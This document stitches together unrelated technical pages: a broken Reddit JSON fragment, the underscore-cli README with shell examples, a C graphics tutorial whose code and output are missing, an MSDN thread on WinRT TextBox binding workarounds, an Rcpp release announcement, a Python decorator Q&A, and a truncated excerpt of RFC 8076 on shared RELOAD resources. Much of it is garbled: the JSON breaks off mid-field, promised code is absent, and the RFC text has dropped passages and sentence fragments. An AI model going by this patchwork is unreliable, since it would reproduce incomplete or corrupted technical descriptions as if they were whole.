Captured with my phone [2448x3264] ","num_comments":70,"score":960 ,"approved_by":null,"over_18":false,"hidden":false,"thumbnail":"","s ubreddit_id":"t5_2sbq3","author_flair_css_class":null,"downs":352,"is_self":false,"permalink":"/r/EarthPorn/comments/rwo a4/eating_breakfast_in_the_norwegian_woods_captured/","name":"t3_rwoa4","created":1333763527,"url":" hBFe.jpg","author_flair_text":null,"author":"pansermannen","created_utc":1333738327,"media":null,"num_reports":null,"ups ":1312}},{"kind":"t3","data":{"domain":"imgur.com","banned_by":null,"media_embed":{},"subreddit":"EarthPorn","selftext_h tml":null,"selftext":"","likes":null,"saved":false,"id":"rwgmb","clicked":false,"title":"The Rugged Beauty of Zion NP Ut ah at Sunrise [OC] (1924x2579)","num_comments":5,"score":72,"approved_by":null,"over_18":false,"hidden":false,"thumbnail ":"","subreddit_id":"t5_2sbq3","author_flair_css_class":null,"downs" :20,"is_self":false,"permalink":"/r/EarthPorn/comments/rwgmb/the_rugged_beauty_of_zion_np_utah_at_sunrise_oc/","name":"t 3_rwgmb","created":1333755348,"url":"","author_flair_text":null,"author":"TeamLaws","created_utc": 1333730148,"media":null,"num_reports":null,"ups":92}},{"kind":"t3","data":{"domain":"flickr.com","banned_by":null,"media _embed":{},"subreddit":"EarthPorn","selftext_html":null,"selftext":"","likes":null,"saved":false,"id":"rvuiu","clicked": false,"title":"Falls and island near Valdez, AK on a rainy day [4200 x 3000]","num_comments":10,"score":573,"approved_by As I've already mentioned, it would be trivial to pretty print the data with 'underscore print'. 
However, if we are just trying to get a sense of the structure of the data, we can do one better:

TODO: working on a 'summarize' command -- INSERT_THAT_HERE (2012-05-04)

Now, let's say that we want a list of all the image titles; using a json:select query, this is downright trivial:

cat example-data/earthporn.json | underscore select .title

Which prints:

[ ... ]

If we want to grep the results, 'text' is a better format choice:

cat example-data/earthporn.json | underscore select .title --outfmt text

Let's create code-style names for those images using the 'camelize' function from underscore.string:

cat earthporn.json | underscore select '.data .title' | underscore map 'camelize(value.replace(/\[.*\]/g,"")).replace(/[^a-zA-Z]/g,"")' --outfmt text

Which prints ...

FjarrgljfurCanyonIceland
NewTownEdinburghScotland
SunriseInBryceCanyonUT
KariegaGameReserveSouthAfrica
ValleDeLaLunaChile
FrostedTreesAfterASnowstormInLaaxSwitzerland

Try doing THAT with any other CLI one-liner!

This one is straight out of our own Makefile:

underscore -i package.json process 'vv=data.version.split("."); vv[2]++; data.version=vv.join("."); data;' -o package.json

This is one I did at work the other day. Chrome --> Dev Console (CMD-OPT-J) --> Network Tab --> (right click context menu) --> Save All as HAR. I have no idea why it's called a "HAR" file, but it's pure JSON data ... pretty verbose stuff, but I just want the urls ...

cat site.har | underscore select '.url' --outfmt text | grep mydomain > urls.txt

Well, I'd also like to ack through the contents of all those files. Best to get a local snapshot of it all:

cat urls.txt | while read line; do curl $line > $(echo $line | perl -pe 's|https?://([^?]*)[?]?.*|$1|'); done

And I'm off to the races analyzing the behavior and load ordering of a complex production site that dynamically loads (literally) hundreds of individual resources off the network.
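The camelize pipeline shown earlier is easy to approximate outside the shell. The helper below is my own Python re-implementation of what underscore.string's camelize plus the two replace() calls do; it is an illustration, not the actual JavaScript code:

```python
import re

def code_style_name(title):
    # Mirror the shell pipeline: strip "[...]" size tags, camelize on
    # whitespace/dashes/underscores, then drop anything non-alphabetic.
    s = re.sub(r"\[.*\]", "", title)
    s = re.sub(r"[-_\s]+(.)", lambda m: m.group(1).upper(), s)  # camelize
    return re.sub(r"[^a-zA-Z]", "", s)

# Hypothetical reddit-style title, invented for the example:
print(code_style_name("Sunrise in Bryce Canyon, UT [1024x768]"))
# -> SunriseInBryceCanyonUT
```

Applied to a title like "Frosted trees after a snowstorm in Laax Switzerland [2048x1365]" it produces FrostedTreesAfterASnowstormInLaaxSwitzerland, matching the output listed above.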
Sure, I could have viewed all that stuff inside Chrome, but I wanted a local directory-structured snapshot that I could serve on a local Nginx instance by adding entries in /etc/hosts that mapped the production domains to 127.0.0.1. Now I can run the exact production site locally, make changes, and see what they would do.

Look at Examples.md for a more comprehensive list of examples.

This section is intended to capture all the places where I spent a great deal of effort to get the best possible behavior on something subtle, aka "polish". It also captures some of the intended "best behaviors" that I haven't had cycles to implement yet.

When using the 'template' command, we go to great lengths to provide a fully debuggable experience. We have a custom version of the template compilation code (templates are compiled to JS and then evaluated) that ensures a 1:1 mapping between line numbers in the original *.template file and line numbers in the generated JS code. This code is then loaded as if it were a real Node.js module (literally, using a require() statement). This means that should anything go wrong, the resulting stack traces and syntax exceptions will have correct line numbers from the original template file.

This one is a bit CoffeeScript-inspired. When we parse command-line expressions for commands like 'map', they are evaluated as NodeScript objects. This allows us to retrieve the last value in the expression. In a previous version we wrapped expressions in function boilerplate; however, this blocked the use of semicolons within an expression. With first-class Script objects, we can evaluate multiple semicolon-delimited expressions and still capture the value from the last expression evaluated. Thus, all of the following expressions will return "10".
underscore run '5 + 5'
underscore run 'x=5; y=5; x+y;'
underscore run 'x=5, y=5, x+y;'

This even works to find the last evaluated value inside conditional branches (these also return 10):

underscore run 'x=5; if (x > 0) { 10; } else { 0; }'            # last value is 10
underscore run 'x=5; if (x > 0) { y=5; } else { y=-99; } x+y;'  # last value is 'x+y'

In general, the principle here is that the code should just return what you intuitively expect without requiring much thought.

If you type a CoffeeScript expression and forget to use the '--coffee' flag, Underscore-CLI will first attempt to parse it as JavaScript, and if that fails, parse it as CoffeeScript. However, a warning is emitted: "Warning: Parsing user expression 'foo?.bar?.baz' as CoffeeScript. Use '--coffee' to be more explicit." Why do we print a warning? Unfortunately, there are a number of language features that are ambiguous between JS and Coffee, i.e., expressions that are valid in both languages but with different meaning. For example:

test ? 10 : 20; // JS: if test is true, then 10, else 20
test ? 10 : 20; // Coffee: if test is true, then test, else {10: 20}. Tragic.

Loading the 'coffee-script' npm module takes 50+ ms. JSONSelect is another 5 ms. That may not sound like much time, but it's the difference between 153 ms and 93 ms, and 153 ms is definitely human-perceivable. It will also make a difference if you are writing a quick-and-dirty bash loop that executes underscore-CLI repeatedly. Plus, fast just feels good.

A few more notes... Node.js takes about 33 ms to run "hello world", and 45 ms if you either "require('fs')" or 'require' anything that's not pre-compiled into the node executable (pretty hard to avoid that). Adding underscore, underscore.string and a few of node's pre-compiled modules, basic code loading takes ~60 ms. That leaves ~33 ms spent on actually running code that initializes the command list and decides what to do with the command-line args that were passed in.
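The last-expression-value behavior described above comes for free with Node's Script objects; elsewhere you would build it by hand. A Python sketch of the same idea (my own illustration, not how underscore-cli works internally): exec every statement, then eval the final one separately if it is an expression:

```python
import ast

def run_and_return_last(source):
    # Execute every statement; if the final one is an expression,
    # evaluate it separately and return its value (like `underscore run`).
    tree = ast.parse(source, mode="exec")
    env = {}
    if tree.body and isinstance(tree.body[-1], ast.Expr):
        last = ast.Expression(tree.body.pop().value)
        exec(compile(tree, "<run>", "exec"), env)
        return eval(compile(last, "<run>", "eval"), env)
    exec(compile(tree, "<run>", "exec"), env)
    return None

print(run_and_return_last("x=5; y=5; x+y"))   # -> 10
```

Unlike Node's Script objects, this simple version does not capture values out of conditional branches; that is exactly the extra capability the README is pointing at.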
Thirdly, as of v0.2.16, underscore-CLI now marks these packages as "optionalDependencies", meaning that on the minority of systems where there is an issue installing one of those packages (there was a report of problems with msgpack), the overall underscore-CLI installation won't fail.

As mentioned above, dense JSON is nearly unreadable to human beings, so we want to pretty print it. JSON.stringify will accept an 'indentation' parameter that does make JSON much more readable; however, this will put everything on a new line, resulting in output that is absurdly verbose -- printing "[1, 2, 3, 4]" will take up 6 lines despite having only 12ish characters. Node's "util.inspect" is a bit better, but it doesn't print valid JSON (e.g., inspect uses single instead of double quotes). I don't want to compromise on JSON compatibility just to get pretty output. So I wrote my own formatter that gives the best of both worlds. The default output format is strictly JSON compatible and human readable, yet avoids excessive verbosity by putting small objects and arrays on a single line where possible. The formatting code is also pretty flexible, allowing me to support colorization and a bunch of other nifty features; at some point, I may break the formatter into its own npm module.

TBI - as of this version, if there is no data, we will block for reading STDIN. We should only do this if the user expression refers to the well-known 'data' variable. This would unify the 'process' and 'run' commands.

TBI - as of this version, the last evaluated expression value is always returned. However, sometimes you want to mutate the existing data instead of returning a new value. This should be easy. If the expression does something like 'data.key = value', then the return value should be 'data'. Today, you have to write 'data.key = value; data'. I want that last part to be implicit, but only if you mutate the data variable.
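The formatter behavior described above -- strictly valid JSON, but with small objects and arrays inlined -- can be sketched in a few lines. This Python version is my own approximation, not the actual underscore-cli formatter:

```python
import json

def smart_format(value, indent=0, width=60):
    # Try the one-line rendering first; wrap only when the compact
    # form would be too long. Output is always valid JSON.
    compact = json.dumps(value)
    if len(compact) <= width or not isinstance(value, (dict, list)):
        return compact
    pad = " " * (indent + 2)
    if isinstance(value, list):
        items = [smart_format(v, indent + 2, width) for v in value]
        open_, close = "[", "]"
    else:
        items = [json.dumps(k) + ": " + smart_format(v, indent + 2, width)
                 for k, v in value.items()]
        open_, close = "{", "}"
    body = (",\n" + pad).join(items)
    return open_ + "\n" + pad + body + "\n" + " " * indent + close

print(smart_format([1, 2, 3, 4]))   # stays on one line: [1, 2, 3, 4]
```

Large structures wrap, but every leaf collection that fits under the width budget stays on a single line, which is the whole trick.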
And there should be a command-line flag "--retval={expr,data,auto}", with 'auto' being the default.

TBI - as of this version, all commands slurp the entire input stream and parse it before doing any data manipulation. This works fine for the vast majority of scenarios, but if you actually had a 30 GB JSON file, it would be a bit clunky. For set-oriented commands like 'map', a smarter core engine plus a smarter JSON parser could enable stream-oriented processing, where data processing occurs continuously as the input is read and streamed to the output, without ever needing to store the entire dataset in memory at once. This feature requires a custom JSON parser and some serious fancy, but I'll get to it eventually. If you have any performance-sensitive use-cases, post an issue on GitHub, and I'd be glad to work with you.

I strongly encourage bug reports and feature requests. I'll look at all of them eventually, though if I'm slammed at work or have something happening in my personal life, I might get a little bit behind. It is my hobby project after all, and by all means, you are welcome to submit a pull request, which I'll get to a heck of a lot faster than a feature I have to build myself :)

When reporting a bug that might be related to a dependency, it's usually helpful to list out which platform you are on. Here's my info (as of 2012-11-05):

# uname -a
Darwin ddopson.local 11.4.2 Darwin Kernel Version 11.4.2: Thu Aug 23 16:25:48 PDT 2012; root:xnu-1699.32.7~1/RELEASE_X86_64 x86_64 i386 MacBookPro10,1 Darwin
# node -v
v0.8.1
# npm -v
1.1.35
# npm ls
underscore-cli@0.2.16 /Users/Dopson/work/other/underscore-cli
├── coffee-script@1.4.0
├─┬ commander@1.0.5
│ └── keypress@0.1.0
├── JSONSelect@0.4.0
├─┬ mocha@1.6.0
│ ├── commander@0.6.1
│ ├── debug@0.7.0
│ ├── diff@1.0.2
│ ├── growl@1.5.1
│ ├─┬ jade@0.26.3
│ │ └── mkdirp@0.3.0
│ ├── mkdirp@0.3.3
│ └── ms@0.3.0
├── msgpack@0.1.7
├── underscore@1.4.2
└── underscore.string@2.3.0
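On the stream-oriented processing noted as TBI above: for top-level JSON arrays, a poor man's version of that mode can be built on an incremental decoder. A Python sketch using the stdlib's json.JSONDecoder.raw_decode (an illustration only; it still assumes the whole text is addressable, so true constant-memory streaming would additionally need chunked reads and a smarter scanner):

```python
import json

def iter_array_items(text):
    # Yield elements of a top-level JSON array one at a time instead of
    # parsing the whole document: scan past '[', then repeatedly
    # raw_decode, which returns (value, index_after_value).
    dec = json.JSONDecoder()
    i = text.index("[") + 1
    while True:
        while i < len(text) and text[i] in " \t\r\n,":
            i += 1
        if i >= len(text) or text[i] == "]":
            return
        value, i = dec.raw_decode(text, i)
        yield value

doc = '[{"score": 960}, {"score": 72}, {"score": 573}]'
print([item["score"] for item in iter_array_items(doc)])   # [960, 72, 573]
```

Each element is materialized and handed to the caller before the next one is even looked at, which is the shape a streaming 'map' would want.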
https://www.npmjs.com/package/underscore-cli
How to create a Heart using C Graphics

Prerequisite: graphics.h, How to include graphics.h?

The task is to write a C program to draw a Heart using graphics in C.

Approach: To run the program we have to include the below header file:

#include <graphics.h>

We will create a Heart with the help of the below functions:

- rectangle(x1, y1, x2, y2): A function from the graphics.h header file which draws a rectangle on the screen.
- ellipse(x, y, stangle, endangle, xradius, yradius): A function from the graphics.h header file which draws an elliptical arc on the screen between the given start and end angles.
- line(x1, y1, x2, y2): A function from the graphics.h header file which draws a line.
- setfillstyle(pattern, color): A function from the graphics.h header file which sets the current fill pattern and fill color.
- floodfill(x, y, border): A function from the graphics.h header file which fills an enclosed area, using the current fill pattern and fill color, up to the given border color.

Below is the implementation to draw a Heart using graphics in C:

Output: Below is the output of the above program:
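The original code listing did not survive extraction here, but the construction is simple: two upper half-ellipses form the lobes, and two straight lines meet in the bottom point. The Python sketch below mirrors that geometry on a character grid purely as an illustration of the approach; the article's actual program uses the graphics.h calls listed above:

```python
import math

W, H = 41, 21
grid = [[" "] * W for _ in range(H)]

def plot(x, y):
    xi, yi = int(round(x)), int(round(y))
    if 0 <= xi < W and 0 <= yi < H:
        grid[yi][xi] = "*"

def ellipse_arc(cx, cy, rx, ry):
    # Upper half of an ellipse, analogous to ellipse(cx, cy, 0, 180, rx, ry)
    for k in range(181):
        t = math.radians(k)
        plot(cx + rx * math.cos(t), cy - ry * math.sin(t))

def line(x1, y1, x2, y2):
    # Straight segment, analogous to line(x1, y1, x2, y2)
    steps = max(abs(x2 - x1), abs(y2 - y1))
    for k in range(steps + 1):
        plot(x1 + (x2 - x1) * k / steps, y1 + (y2 - y1) * k / steps)

ellipse_arc(10, 5, 10, 5)    # left lobe
ellipse_arc(30, 5, 10, 5)    # right lobe
line(0, 5, 20, 20)           # left side of the V
line(40, 5, 20, 20)          # right side of the V

print("\n".join("".join(row) for row in grid))
```

The arc endpoints (0, 5) and (40, 5) coincide with the upper endpoints of the two lines, so the outline closes; in the C version, floodfill would then fill the enclosed region.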
https://www.geeksforgeeks.org/how-to-create-a-heart-using-c-graphics/
UpdateSourceTrigger and BindingExpression(Base) are missing?

From what I can tell, the TextBox still updates its binding based on LostFocus (as it does in SL/WPF, so I guess it's good that it's consistent), but there doesn't seem to be a way to change/override that. There is no UpdateSourceTrigger on the Binding - not that I expected it, given that SL didn't have LostFocus/PropertyChanged values in that enum anyway. However, the BindingExpression(Base) classes do not seem to be available in WinRT. With the latter, at least one could get the BindingExpression and call UpdateSource to force the source to be updated with the value of the target. How should one go about forcing a binding of the TextBox's Text property to push its value into the Binding?

Answers:

@AndrewS Thank you for reporting this issue. We're working on mitigation. In the Developer Preview bits, I haven't found a way to force the source to update using binding. You can however forgo binding for now and listen for the TextChanged event and set a property manually. Any other scenarios you need UpdateSourceTrigger for?

- Proposed as answer by Aaron Wroblewski Wednesday, November 02, 2011 7:40 PM
- Edited by Aaron Wroblewski Wednesday, November 02, 2011 7:49 PM

That really isn't a very good workaround. I could live with that if we could get to the BindingExpression in code and then call UpdateSource when TextChanged was invoked. However, BindingExpression(Base) doesn't exist in WinRT. We're writing 3rd-party controls and we don't necessarily know the target of the binding.

Why is this even marked as answer? This is unacceptable. All this promoting of MVVM, and then as soon as you deviate from the simplest UI expectations, you're supposed to ditch it? I don't want to wire up ten textboxes, mess with the XAML and forgo the whole MVVM thing.
I agree that this issue/question should not be marked as solved, since it is a very poor solution in an MVVM, or any loosely coupled, coding scenario for that matter. UpdateSourceTrigger with PropertyChanged came in the WP7 Mango release, so why can't you add the same thing here? Why is WinRT only Silverlight 3 XAML capable instead of Silverlight 4 or 5? It is also really bad that it's not even possible to implement a Behavior to solve this issue, since we are missing BindingExpression and the UpdateSource method, etc. In the first release of WP7 we could at least use the WP7 behavior, UpdateTextBindingOnPropertyChanged, from Prism to solve this issue, but that's not even possible here. Please let me know of any other possible and not so bad solution, and PLEASE fix this for the final release, since the Binding functionality in WinRT feels years behind the current technologies!

Hi. I am starting to walk my first steps with WinRT, and I was also a little bit surprised, and a bit frightened I might add, when I discovered the nonexistence of the UpdateSourceTrigger property in the Binding class and the nonexistence of BindingExpression, thus disabling explicit bind updates (not to talk about the MultiBinding class). I suspect this has nothing to do with these being preview versions of the Windows 8 SDK. Instead, I feel that all heavy behaviors were filtered and purged, thus leaving it to the developer to implement custom scenarios. Don't forget that we can now dive into the guts of the beast using C++. But I bet what you need is a solution, not a dissertation. In fact, to tackle this problem, which is to keep the MVVM approach, you have two options, well, two flavors of the same option: create your own DependencyProperty to use as an attached behavior. What made sense for me was to create an attached dependency property.
But by reading the new WinRT API documentation it became clear that attached dependency properties are used only with value types, but the solution I had in mind included binding to an Action<string>. Enough talking. Here's how I extended a TextBox to add the behavior you are talking about:

public class ExtendedTextBox : TextBox
{
    public static readonly DependencyProperty CustomActionProperty =
        DependencyProperty.Register(
            "CustomAction",
            typeof(Action<string>),
            typeof(ExtendedTextBox),
            new PropertyMetadata(null, OnPropertyChanged));

    public Action<string> CustomAction
    {
        get { return (Action<string>)GetValue(CustomActionProperty); }
        set { SetValue(CustomActionProperty, value); }
    }

    private static void OnPropertyChanged(DependencyObject d, DependencyPropertyChangedEventArgs e)
    {
        if (e.NewValue != null)
            (d as ExtendedTextBox).TextChanged += ExtendedTextBox_TextChanged;
        else
            (d as ExtendedTextBox).TextChanged -= ExtendedTextBox_TextChanged;
    }

    async static void ExtendedTextBox_TextChanged(object sender, TextChangedEventArgs e)
    {
        await CoreWindow.GetForCurrentThread().Dispatcher.RunAsync(
            CoreDispatcherPriority.Normal,
            () => (sender as ExtendedTextBox).CustomAction((sender as ExtendedTextBox).Text));
    }
}

I am being a little bit excessive with the use of the Dispatcher, since I haven't had enough time to consolidate the async programming model in WinRT.

public Action<string> UpdateBindedViewModelProperty
{
    get { return new Action<string>((value) => NewLabelName = value); }
}

<plmrfc:ExtendedTextBox CustomAction="{Binding UpdateBindedViewModelProperty}" />

Hope it helps. Let me know if something's still bugging you.

- Proposed as answer by Pedro Frederico Sunday, June 17, 2012 12:39 PM
- Edited by Pedro Frederico Sunday, June 17, 2012 1:18 PM

Very good call, I'm using this code!
However, it's very unfortunate that I have to subclass TextBox and write a ton of code that I'm sure will look cryptic to me in six months, just to get around a framework restriction in a slightly more elegant way than simply handling TextChanged events in code and totally breaking the MVVM model. This is definitely the better of two evils...

Well, you should be aware that subclassing means that the implicit style you might define needs to target your derived type - at least that's how SL/WPF have worked. So if you create a style that targets TextBox, it will not affect this derived control. You will need to create a style that targets this type (although you could use BasedOn to point to the TextBox style).

To me, this approach doesn't address the issue. First, you need to define and expose a delegate for every property you wish to bind to that might require this. While this might be acceptable for an application developer, for a control developer this is a real mess, since it would clutter the public API with something that shouldn't even be needed. Even for an application developer I would think this would be a pain, because now every time your designer is creating XAML that binds the Text property, they need to go to the developer to have them create a delegate that they can bind this other property to, and they have to keep that in sync with the property they are binding the Text property to. This is even worse if the binding of the Text property was using a value converter, because the Action method would need to know to do the same logic, or know what value converter was used in XAML, to be able to do the same conversion.

Also, this doesn't address the other use case about being able to get to the binding expression. That is, to be able to leave the property as updating on lost focus but conditionally being able to tell the binding infrastructure to push the value back into the source of the binding (via the UpdateSource method of the BindingExpression).
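For readers coming from outside XAML, the semantics being argued over can be shown with a toy model. Everything below is plain Python with invented names; it only mirrors what UpdateSourceTrigger (LostFocus vs. PropertyChanged vs. Explicit) and BindingExpression.UpdateSource control:

```python
class Binding:
    # Toy model of target -> source propagation, gated by a trigger mode.
    def __init__(self, source, attr, trigger="lost_focus"):
        self.source, self.attr, self.trigger = source, attr, trigger
        self._pending = getattr(source, attr)

    def on_text_changed(self, text):      # fires on every keystroke
        self._pending = text
        if self.trigger == "property_changed":
            self.update_source()

    def on_lost_focus(self):              # fires when the control loses focus
        if self.trigger == "lost_focus":
            self.update_source()

    def update_source(self):              # the BindingExpression.UpdateSource role
        setattr(self.source, self.attr, self._pending)

class ViewModel:
    name = ""

vm = Binding.__new__(object) if False else ViewModel()
b = Binding(vm, "name", trigger="property_changed")
b.on_text_changed("Al")
print(vm.name)   # "Al" -- pushed immediately, no focus change needed
```

The thread's complaint, restated in these terms: WinRT's TextBox hard-wires the lost_focus behavior and exposes neither the trigger knob nor the update_source hook.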
- You can create a wrapper class so you don't have to do this each time; the source code is here: and don't bind to Text but to the BindableText property.

If MS intended to make WinRT apps more responsive by dropping this useful feature, they have presumably done the exact opposite, by forcing developers to come up with workarounds that tend to be less fine-tuned than MS could do!

See my post here for a behaviour-based workaround which doesn't require subclassing the TextBox:
http://social.msdn.microsoft.com/Forums/windowsapps/en-US/775f1692-2837-471c-95fc-710bf0e9cc53/updatesourcetrigger-and-bindingexpressionbase-are-missing?forum=winappswithcsharp
Rcpp 0.11.5

The new release 0.11.5 of Rcpp just reached the CRAN network for GNU R, and a Debian package has also been uploaded. Rcpp has become the most popular way of enhancing GNU R with C++ code. As of today, 345 packages on CRAN depend on Rcpp for making analyses go faster and further; BioConductor adds another 41 packages, and casual searches on GitHub suggest dozens more. This release continues the 0.11.* release cycle, adding another large number of small bug fixes, polishes and enhancements. Since the previous release in January, we incorporated a number of pull requests and changes from several contributors. This time, JJ deserves a special mention as he is responsible for a metric ton of the changes listed below, making Rcpp Attributes even more awesome. As always, you can follow the development via the GitHub repo and particularly the Issue tickets and Pull Requests. And any discussions, questions, … regarding Rcpp are always welcome at the rcpp-devel mailing list. See below for a detailed list of changes extracted from the NEWS file.
- A Rcpp::printfunction was added as a wrapper around Rf_PrintValue. Changes in Rcpp Attributes: - The pkg_types.hfile is now included in RcppExports.cppif it is present in either the inst/includeor src. - sourceCppwas modified to allow includes of local files (e.g. #include "foo.hpp"). Implementation files (.cc; .cpp) corresponding to local includes are also automatically built if they exist. - The generated attributes code was simplified with respect to RNGScopeand now uses RObjectand its destructor rather than SEXPprotect/unprotect. - Support addition of the rngparameter in Rcpp::exportto suppress the otherwise automatic inclusion of RNGScopein generated code. - Attributes code was made more robust and can e.g. no longer recurse. - Version 3.2 of the Rtools is now correctly detected as well. - Allow ‘R’ to come immediately after ‘***’ for defining embedded R code chunks in sourceCpp. - The attributes vignette has been updated with documentation on new features added over the past several releases. Changes in Rcpp tests: - On Travis CI, all build dependencies are installed as binary .debpackages resulting in faster tests..
https://www.r-bloggers.com/2015/03/rcpp-0-11-5/
Can one write something like:

class Test(object):

    def _decorator(self, foo):
        foo()

    @self._decorator
    def bar(self):
        pass

@Test._decorator(self)

What you're wanting to do isn't possible. Take, for instance, whether or not the code below looks valid:

class Test(object):

    def _decorator(self, foo):
        foo()

    def bar(self):
        pass

    bar = self._decorator(bar)

It, of course, isn't valid since self isn't defined at that point. The same goes for Test, as it won't be defined until the class itself is defined (which it's in the process of). I'm showing you this code snippet because this is what your decorator snippet transforms into. So, as you can see, accessing the instance in a decorator like that isn't really possible, since decorators are applied during the definition of whatever function/method they are attached to, and not during instantiation.

If you need class-level access, have the decorator return a wrapper function:

class Test(object):

    @classmethod
    def _decorator(cls, foo):
        def wrapper(self):
            return foo(self)
        return wrapper

    def bar(self):
        pass

Test.bar = Test._decorator(Test.bar)
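For reference, a pattern that does work in plain Python: define the decorator as an ordinary function inside the class body (at that point it is not yet a method, so no self is involved), and let the returned wrapper receive self at call time. Names here are illustrative:

```python
import functools

class Test:
    def _decorator(foo):                 # a plain function during class creation
        @functools.wraps(foo)
        def wrapper(self, *args, **kwargs):
            # `self` is available here, at call time
            return ("decorated", foo(self, *args, **kwargs))
        return wrapper

    @_decorator
    def bar(self):
        return 42

    # Optional: rebind so _decorator stays usable after class creation too.
    _decorator = staticmethod(_decorator)

print(Test().bar())   # ('decorated', 42)
```

This works because the class body executes top to bottom as ordinary code: when @_decorator runs, _decorator is just a local function, and self only enters the picture when the wrapped method is eventually called on an instance.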
https://codedump.io/share/cuHmTjDeNwwg/1/python-decorators-in-classes
Request for Comments: 8076
Category: Standards Track
ISSN: 2070-1721
T. Schmidt, Ed. (HAW Hamburg)
G. Hege (daviko GmbH)
M. Waehlisch (link-lab & FU Berlin)
March 2017

A Usage for Shared Resources in RELOAD (ShaRe)

Abstract

This document defines a REsource LOcation And Discovery (RELOAD) Usage for managing shared write access to RELOAD Resources, which is useful whenever multiple peers cooperate in peer-independent rendezvous processes.

Table of Contents

3. Shared Resources in RELOAD
   3.1. Mechanisms for Isolating Stored Data
4. Access Control List Definition
   4.1. Overview
   4.2. Data Structure
5. Extension for Variable Resource Names
   5.1. Overview
   5.2. Data Structure
   5.3. Overlay Configuration Document Extension
6. Access Control to Shared Resources
   6.1. Granting Write Access
   6.2. Revoking Write Access
   6.3. Validating Write Access through an ACL
   6.4. Operations of Storing Peers
   6.5. Operations of Accessing Peers
   6.6. USER-CHAIN-ACL Access Policy
7. ACCESS-CONTROL-LIST Kind Definition
8. Security Considerations
   8.1. Resource Exhaustion
   8.2. Malicious or Misbehaving Storing Peer
   8.3. Trust Delegation to a Malicious or Misbehaving Peer
   8.4. Privacy Issues
9. IANA Considerations
   9.1. Access Control Policy
   9.2. Data Kind-ID
   9.3. XML Namespace Registration
10. References
   10.1. Normative References
   10.2. Informative References
Acknowledgments
Authors' Addresses

1. Introduction

[RFC6940] defines the base protocol for REsource LOcation And Discovery (RELOAD), which allows for application-specific extensions by Usages. The present document defines such a RELOAD Usage for managing shared write access to RELOAD Resources and a mechanism to store Resources with variable names.

[RFC7904], or distributed conferencing). Of particular interest are rendezvous processes, where a single identifier is linked to multiple, dynamic instances of a distributed cooperative service.

Shared write access is based on a trust delegation mechanism

it must contain the username of the Resource creator.

2. Terminology

The key words "MUST", "MUST NOT", "REQUIRED", "SHALL", "SHALL NOT", "SHOULD", "SHOULD NOT", "RECOMMENDED", "MAY", and "OPTIONAL" in this document are to be interpreted as described in [RFC2119]. This document uses the terminology and definitions from the RELOAD base [RFC6940] and [RFC7890], in particular the RELOAD Usage, Resource, and Kind.

- Storage of the Resource/Kind pairs to be shared.
- Storage of an Access Control List (ACL) associated with those Kinds.

ACLs are created by the Resource Owner and contain ACL items, each delegating the permission of writing the shared Kind to a specific user called the Authorized Peer.

the initial field within the Kind data, and write concurrency does not occur.
The following algorithm will generate an array indexing scheme that avoids collisions:

1. Obtain the Node-ID of the certificate that will be used to sign the stored data.
2. Take the least significant 24 bits of that Node-ID to prefix the array index.
3. Append an 8-bit individual index value to those 24 bits of the Node-ID.

The resulting 32-bit long integer MUST be used as the index for storing an array entry in a Shared Resource. The 24 bits of the Node-ID serve as a collision-resistant identifier. The 8-bit individual index remains under the control of a single Peer and can be incremented individually for further array entries. In total, each Peer can generate 256 distinct entries for application-specific use.

The mechanism to create the array index inherits collision resistance from the overlay hash function in use (e.g., SHA-1). It is designed to work reliably for small sizes of groups, as applicable to resource sharing. In the rare event of a collision, the Storing Peer will refuse to (over-)write the requested array index and protect indexing integrity as defined in Section 6.1. A Peer could rejoin the overlay with a different Node-ID in such a case.

Therefore, each Access Control List data structure

0102 represents the first trust delegation to an Authorized Peer that is thus permitted to write to the Shared Resource of Kind-ID 1234. Additionally, the Authorized Peer Alice is also granted write access to the ACL, as indicated by the allow_delegation flag (ad) set to 1. This configuration authorizes Alice to store further trust delegations to the Shared Resource, i.e., add items to the ACL. On the contrary, index 0x456def0103.

Note that overwriting existing items in an Access Control List with a change in the Kind-ID revokes all trust delegations in the corresponding subtree (see Section 6.2). Authorized Peers are only enabled to overwrite existing ACL items they own.
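The index construction just described (24 low-order bits of the Node-ID, then an 8-bit per-peer counter) is mechanical enough to sketch in a few lines of Python; the Node-ID values here are made up so that their low 24 bits match the prefixes used in Figure 1:

```python
def shared_array_index(node_id: int, individual_index: int) -> int:
    # 24 least significant bits of the Node-ID, followed by an 8-bit
    # per-peer counter, yielding the 32-bit array index of Section 3.1.
    assert 0 <= individual_index <= 0xFF
    return ((node_id & 0xFFFFFF) << 8) | individual_index

# Hypothetical Node-IDs whose low 24 bits match Figure 1's prefixes:
owner_node = 0x99123abc          # low 24 bits: 0x123abc
alice_node = 0x77456def          # low 24 bits: 0x456def
print(hex(shared_array_index(owner_node, 0x01)))   # 0x123abc01
print(hex(shared_array_index(alice_node, 0x01)))   # 0x456def01
```

Since the top 24 bits differ per peer and the bottom 8 bits are under a single peer's control, each peer owns 256 indices that cannot collide with its own earlier entries.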
The Resource Owner is allowed to overwrite any existing ACL item, but should be aware of its consequences on the trust delegation chain.

+------------------------------------------------------+
|                 Access Control List                  |
+-----------+------------------------------+-----------+
|   #Index  |        Array Entries         | signed by |
+-----------+------------------------------+-----------+
| 123abc01  | to_user:Owner Kind:1234 ad:1 |   Owner   |
+-----------+------------------------------+-----------+
| 123abc02  | to_user:Alice Kind:1234 ad:1 |   Owner   |
+-----------+------------------------------+-----------+
| 123abc03  | to_user:Owner Kind:4321 ad:1 |   Owner   |
+-----------+------------------------------+-----------+
| 123abc04  | to_user:Carol Kind:4321 ad:0 |   Owner   |
+-----------+------------------------------+-----------+
|    ...    |             ...              |    ...    |
+-----------+------------------------------+-----------+
| 456def01  | to_user:Bob   Kind:1234 ad:0 |   Alice   |
+-----------+------------------------------+-----------+
|    ...    |             ...              |    ...    |
+-----------+------------------------------+-----------+

Figure 1: Simplified Example of an Access Control List, Including Entries for Two Different Kind-IDs and Varying Delegation (AD) Configurations

Implementors:

res_name_ext: This optional field contains the Resource Name of a ResourceNameExtension (see Section 5.2) to be used by a Shared Resource with a variable resource name. This name is used by.

5. Extension for Variable Resource Names

5.1. Overview

In certain use cases, such as conferencing, username (or Node-ID) while storing data under a specific Resource-ID (see Section 7.3 in [RFC6940]).

which one is a substring of the other. In such cases, the holder of the shorter name could threaten to block the resources of the longer-named peer by choosing the variable part of a Resource Name to contain the entire longer username.
For example, a "*$USER" pattern would allow user EVE to define a resource with name "STEVE" and to block the resource name for user STEVE through this.

consists of patterns for usernames.

It is noteworthy that additional constraints on the syntax and semantics of names can apply according to specific Usages. For example, Address of Record (AOR) syntax restrictions apply when using P2PSIP [RFC7904],

